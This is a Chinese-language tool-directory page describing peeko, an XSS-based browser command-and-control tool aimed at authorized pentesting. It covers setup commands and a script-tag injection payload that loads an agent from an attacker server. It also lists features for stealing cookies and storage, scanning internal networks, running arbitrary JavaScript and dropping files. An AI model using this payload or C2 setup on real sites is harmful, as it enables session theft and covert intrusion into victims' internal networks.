Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
peeko — peeko – 基于浏览器的 XSS C2,用于通过受感染浏览器进行隐蔽的内部网络探测。 | Kitploit
工具/GitHubGitHub/b3rito/peeko
侦察网络映射端口扫描横向移动Web应用程序漏洞利用数据泄露信息收集后渗透利用渗透测试命令与控制
GitHubb3rito/peeko

peeko

23028141年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

peeko – 基于浏览器的 XSS C2,用于通过受感染浏览器进行隐蔽的内部网络探测。

查看仓库

peeko

版本: v1.1

peeko 是一款基于浏览器的 XSS 驱动的 C2(命令与控制)工具,利用受害者的浏览器作为内网中的隐蔽代理。

通过注入的 XSS 载荷,peeko 会与中心服务器建立 WebSocket 连接,使攻击者能够远程控制受害者的浏览器,向内部服务发送请求、扫描网络、窃取数据,甚至执行任意 JavaScript——全程无需投放任何二进制文件。


功能特性

  • 基于 WebSocket 的攻击者与受害者通信
  • 受害者浏览器可获取内部 URL,并扫描 IP 段与端口
  • 简洁的控制面板,支持:
    • 受害者选择器
    • 手动 URL 获取
    • IP 与端口范围扫描器
    • 自定义 JS 执行(手动或自动)
    • 文件投递(自动/手动)
    • 浏览器信息与令牌收集(Cookie、存储等)
    • 日志查看器,可复制或保存为 .txt 或 .json
  • 支持使用自签名证书的 HTTPS
  • 轻量:单个 Python 文件 + 静态资源

环境要求

  • Python 3.8+
  • OpenSSL
  • Linux/macOS(已在基于 Debian 的系统上测试)

快速开始

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. 安装依赖:

    root@kitploit:~
    make install
    
  3. (可选)赋予脚本可执行权限:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. 生成自签名 TLS 证书:

    root@kitploit:~
    make cert
    
  5. 替换 SERVER-IP 占位符:

    打开并编辑以下文件:

    • static/agent.js
    • static/control.html

    将 SERVER-IP 替换为服务器的 IP/域名:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. 启动服务器:

    root@kitploit:~
    make run
    
  7. 在浏览器中打开控制面板:

    root@kitploit:~
    https://192.168.30.136:8443/static/control.html
    
  8. 注入代理脚本(示例 XSS):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    

控制面板功能

核心功能

  • 选择并管理已连接的受害者
  • 通过受害者获取任意内部/外部 HTTPS URL
  • 扫描局域网网段:192.168.1.0/24、10.0.0.10-20 等
  • 扫描指定端口或端口范围(例如 80、443,8000-8080)

文件投递

  • 向受害者发送文件(通过 WebSocket 以 Base64 传输)
  • 受害者浏览器自动下载文件
  • 支持连接时自动上传

信息收集

  • 收集 User Agent、平台、referrer、Cookie、localStorage/sessionStorage
  • 以 JSON 格式查看结果
  • 可手动触发,也可在连接时自动收集

自定义 JS 执行

  • 在受害者浏览器上运行任意 JavaScript
  • 使用 exec:... 格式发送
  • 支持在连接时自动运行
  • 示例:exec:alert(document.cookie);

日志记录

  • 所有内容均被记录(请求、响应、信息转储)
  • 可将日志复制或导出为 .txt 或 .json
  • 极简 UI,设计风格类似终端日志

CORS 与混合内容说明

现代浏览器策略会影响 peeko 可以访问的内容。

CORS 响应

响应头能否读取内容?说明
Access-Control-Allow-Origin: *✅可完全访问响应
无响应头⚠️响应为不透明(opaque)
来源受限❌被阻止或无法读取

混合内容

受害者通过 HTTPS 连接。如果扫描的目标仅使用 HTTP:

  • 浏览器会阻止混合内容请求
  • peeko 无法从 http:// 端点读取数据
  • 扫描时请始终优先选择使用 HTTPS 的目标

实际场景

在渗透测试中,如果你发现某个内部服务在 HTTPS 上响应 Access-Control-Allow-Origin: *,那么 peeko 就成为一个隐蔽代理,可以直接从受害者的浏览器中窃取内部数据,无需投放任何文件,也无需建立出站连接。


项目结构

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

工作流程

  1. 攻击者注入 XSS(利用存储型或反射型漏洞)
  2. 受害者的浏览器通过 WebSocket 连接到 peeko 服务器
  3. 控制面板使攻击者能够:
    • 扫描网络
    • 获取 URL
    • 转储 Cookie、存储数据
    • 运行任意 JS
    • 窃取响应
    • 投放文件

应用场景

  • 通过 XSS 进行内网拓扑测绘
  • 基于浏览器的内网渗透跳板
  • 静默文件投递 / JS 投放器

免责声明

本工具仅用于教育和已授权测试目的。
在未获得明确许可的环境中使用 peeko 是严格禁止的。
请自行承担使用责任。


作者

由 b3rito(mes3hacklab)与 GioPpeTto 编写。

下载工具